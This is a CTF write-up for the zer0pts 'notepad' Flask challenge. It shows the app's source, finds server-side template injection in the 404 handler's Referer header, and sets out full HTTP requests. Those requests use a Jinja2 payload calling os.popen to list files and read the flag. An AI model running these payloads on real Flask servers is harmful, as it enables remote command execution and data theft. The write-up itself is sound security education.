Tags: ssti web 

Rating: 4.7

# ▼▼▼notepad(Web, 326pts, 46/432=10.6%) ▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

※Number of teams that answered one or more questions, **excluding Survey and Welcome**: 218

 ⇒46/218=21.1%

---

## 【Check source code】

```
import flask
import flask_bootstrap
import os
import pickle
import base64
import datetime

app = flask.Flask(__name__)
app.secret_key = os.urandom(16)
bootstrap = flask_bootstrap.Bootstrap(app)

@app.route('/', methods=['GET'])
def index():
return notepad(0)

@app.route('/note/<int:nid>', methods=['GET'])
def notepad(nid=0):
data = load()

if not 0 <= nid < len(data):
nid = 0

return flask.render_template('index.html', data=data, nid=nid)

@app.route('/new', methods=['GET'])
def new():
""" Create a new note """
data = load()
data.append({"date": now(), "text": "", "title": "*New Note*"})
flask.session['savedata'] = base64.b64encode(pickle.dumps(data))

return flask.redirect('/note/' + str(len(data) - 1))

@app.route('/save/<int:nid>', methods=['POST'])
def save(nid=0):
""" Update or append a note """
if 'text' in flask.request.form and 'title' in flask.request.form:
title = flask.request.form['title']
text = flask.request.form['text']
data = load()

if 0 <= nid < len(data):
data[nid] = {"date": now(), "text": text, "title": title}
else:
data.append({"date": now(), "text": text, "title": title})

flask.session['savedata'] = base64.b64encode(pickle.dumps(data))
else:
return flask.redirect('/')

return flask.redirect('/note/' + str(len(data) - 1))

@app.route('/delete/<int:nid>', methods=['GET'])
def delete(nid=0):
""" Delete a note """
data = load()

if 0 <= nid < len(data):
data.pop(nid)
if len(data) == 0:
data = [{"date": now(), "text": "", "title": "*New Note*"}]

flask.session['savedata'] = base64.b64encode(pickle.dumps(data))

return flask.redirect('/')

@app.route('/reset', methods=['GET'])
def reset():
""" Remove every note """
flask.session['savedata'] = None

return flask.redirect('/')

@app.route('/favicon.ico', methods=['GET'])
def favicon():
return ''

@app.errorhandler(404)
def page_not_found(error):
""" Automatically go back when page is not found """
referrer = flask.request.headers.get("Referer")

if referrer is None: referrer = '/'
if not valid_url(referrer): referrer = '/'

html = '<html><head><meta http-equiv="Refresh" content="3;URL={}"><title>404 Not Found</title></head><body>Page not found. Redirecting...</body></html>'.format(referrer)

return flask.render_template_string(html), 404

def valid_url(url):
""" Check if given url is valid """
host = flask.request.host_url

if not url.startswith(host): return False # Not from my server
if len(url) - len(host) > 16: return False # Referer may be also 404

return True

def load():
""" Load saved notes """
try:
savedata = flask.session.get('savedata', None)
data = pickle.loads(base64.b64decode(savedata))
except:
data = [{"date": now(), "text": "", "title": "*New Note*"}]

return data

def now():
""" Get current time """
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')

if __name__ == '__main__':
app.run(
host = '0.0.0.0',
port = '8001',
debug=False
)
```

---

## 【Goal】
・The location of the flag could not be identified...

---

## 【Vulnerability identification】

```
@app.errorhandler(404)
def page_not_found(error):
""" Automatically go back when page is not found """
referrer = flask.request.headers.get("Referer")

if referrer is None: referrer = '/'
if not valid_url(referrer): referrer = '/'

html = '<html><head><meta http-equiv="Refresh" content="3;URL={}"><title>404 Not Found</title></head><body>Page not found. Redirecting...</body></html>'.format(referrer)

return flask.render_template_string(html), 404
```

**SSTI(Server Side Template Injection)** vulnerability exists in Referer header

---

## 【Check restrictions】

```
def valid_url(url):
""" Check if given url is valid """
host = flask.request.host_url

if not url.startswith(host): return False # Not from my server
if len(url) - len(host) > 16: return False # Referer may be also 404

return True
```

(en)https://docs.python.org/3/library/stdtypes.html#str.startswith

(ja)https://docs.python.org/ja/3/library/stdtypes.html#str.startswith

If the host name of the **host header** and **Referer header** are the same, there is no character limit

---

## 【exploit】

Access /ttttt to get a 404 response

```
GET /ttttt HTTP/1.1
Host: {{7*7}}
Referer: http://{{7*7}}/
Content-Length: 0
```

```
HTTP/1.0 404 NOT FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 151
Server: Werkzeug/1.0.0 Python/3.6.9
Date: Mon, 09 Mar 2020 00:50:50 GMT

<html><head><meta http-equiv="Refresh" content="3;URL=http://49/"><title>404 Not Found</title></head><body>Page not found. Redirecting...</body></html>
```

`URL=http://49/`  ※7\*7 = **49** is calculated because of **SSTI** vulnerability.

---

```
GET /ttttt?cmd=ls HTTP/1.1
Host: {{url_for.__globals__.os.popen(request.args.cmd).read()}}
Referer: http://{{url_for.__globals__.os.popen(request.args.cmd).read()}}/
```

```
HTTP/1.0 404 NOT FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 171
Server: Werkzeug/1.0.0 Python/3.6.9
Date: Mon, 09 Mar 2020 01:08:35 GMT

<html><head><meta http-equiv="Refresh" content="3;URL=http://app.py
flag
templates
/"><title>404 Not Found</title></head><body>Page not found. Redirecting...</body></html>
```

```
app.py
flag
templates
```

---

```
GET /ttttt?cmd=cat%20flag HTTP/1.1
Host: {{url_for.__globals__.os.popen(request.args.cmd).read()}}
Referer: http://{{url_for.__globals__.os.popen(request.args.cmd).read()}}/
```

```
HTTP/1.0 404 NOT FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 186
Server: Werkzeug/1.0.0 Python/3.6.9
Date: Mon, 09 Mar 2020 00:54:00 GMT

<html><head><meta http-equiv="Refresh" content="3;URL=http://zer0pts{fl4sk_s3ss10n_4nd_pyth0n_RCE}/"><title>404 Not Found</title></head><body>Page not found. Redirecting...</body></html>
```

`zer0pts{fl4sk_s3ss10n_4nd_pyth0n_RCE}`

---

### 【Other】

After obtaining SECRET_KEY by SSTI,

it seems that the procedure of executing arbitrary code using **serialization of pickle** is an assumed solution...